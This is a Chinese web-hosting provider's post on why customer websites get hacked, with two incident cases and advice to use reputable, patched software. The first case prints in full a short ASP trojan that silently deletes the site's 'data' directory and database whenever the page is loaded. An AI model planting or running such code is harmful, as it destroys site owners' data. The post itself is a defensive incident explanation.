我们做虚拟主机几年来.每个月都会听到客户的网站被黑.包括插入代码.文件被删.问题都在于客户的网站有漏洞造成.我们的服务器不敢说百分百安全(因为世上没有百分百安全的服务器)但我们可以承诺.服务器安全绝对没有问题.专业人员每个月都会去下载最新的系统补丁更新.手动特别的安全设置加上专业的软件安全设置等.全国少有的让ASP.NET脚本和其它脚本一起运行而不会产生安全问题.包括MYSQL和MSSQL我们都做了特别的安全设置.对于系统任何危险角落.都不会放过.如果客户的程序没有任何问题.网站就是安全的.

最大的危险就是客户从网上下载程序用.可以说从网上下载的代码.10个有8个有问题.特别是免费的或是破解的.我们建议您在选程序时选择出名.更新速度快的.多人使用的程序.因为多人用了.开发商才有兴趣去更新代码.修补漏洞等.不少客户试过下载不知名程序.一年后发现网站有漏洞.再去那家开发商时才发现已经关门了.这样给自己造成损失.

以下是几个非典型案例:

某一天.一个新客户跟我们说他的库被删掉了.库放在DATA里面.还说了一些难听的话.说是我们服务器的问题等等.那次我们查了他的文件看看是不是有木马.经查找没发现特别文件.一般木马大于1KB.后来帮他恢复了备份文件.过了二十多天.突然这个文件又不见了.这次客户疯了一样(说难听了~~~~) 没办法.为了证明清白.我们只能一个文件一个文件帮他查.结果发现一个这样的文件.代码如下.

<HTML>
    <BODY>
      <%
          Dim objFSO
          Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
         
          If objFSO.FolderExists(Server.MapPath("data")) Then
              objFSO.DeleteFolder Server.MapPath("data")
           Response.write"good"
          Else
              Response.Write "文件夹不存在"
          End If
          Set objFSO = Nothing
      %>
    </BODY>
</HTML>

文件功能如下.

          If objFSO.FolderExists(Server.MapPath("data")) Then
              objFSO.DeleteFolder Server.MapPath("data")

如果data 目录存在
那么
objFSO.DeleteFolder  删除目录 data

问题就查到了.这个文件是自杀式的.放此木马的人特别鬼.就算搜索访问这个文件.库也会被删.可以说强.而且我们一直在查大于1KB的木马.所以这个文件第一次时漏掉查.此时客户又说.那怎么有这个文件?是不是你们服务器不安全.呵呵.没办法.做人难.查了此文件建立的时间.刚好是他跟我们买空间的那一天.也就是说.这个文件在他买空间之前已经有了.是他传上去的.当然他应该也是不知道有这个文件存在的.删除此文件.现在半年来都没有发现问题.客户笑了.我们也笑了.........

案例二:

某日.一客户跟我们说.他的网站DVBBS PHP版被人放了代码.跳转到了别的网站.DVBBS.PHP是新出的.照理说没有问题.经我们查核.发现恶意代码是在风格CSS里面.查来查去.发现他的备份文件.4天前在服务器上的备份文件并没有这个CSS 恶意代码.也就是说是这两天加上去的.问客户之后.客户说.这两天有一个人免费帮他改了风格....................................天下没有免费午餐........后来证实确实是被人加上.所以说大家有问题请到官方网站找解决.不要随便给被人FTP用户名.密码等.更别说免费帮您改东西.现在这样的人很少了.还是自己解决吧.

更多案例我就不说了.因为都是同一个问题.网站有注入漏洞.后台被人爆出管理员用户名.密码.上传漏洞等.

一个网站要安全.就要用好的程序.当然也有漏的时候.没有百分百安全的网站.和服务器.使用出名的程序能把网站危险性降低.有空上官方站下载补丁.一个好的程序.每个月都会有补丁出.来修复问题和漏洞等.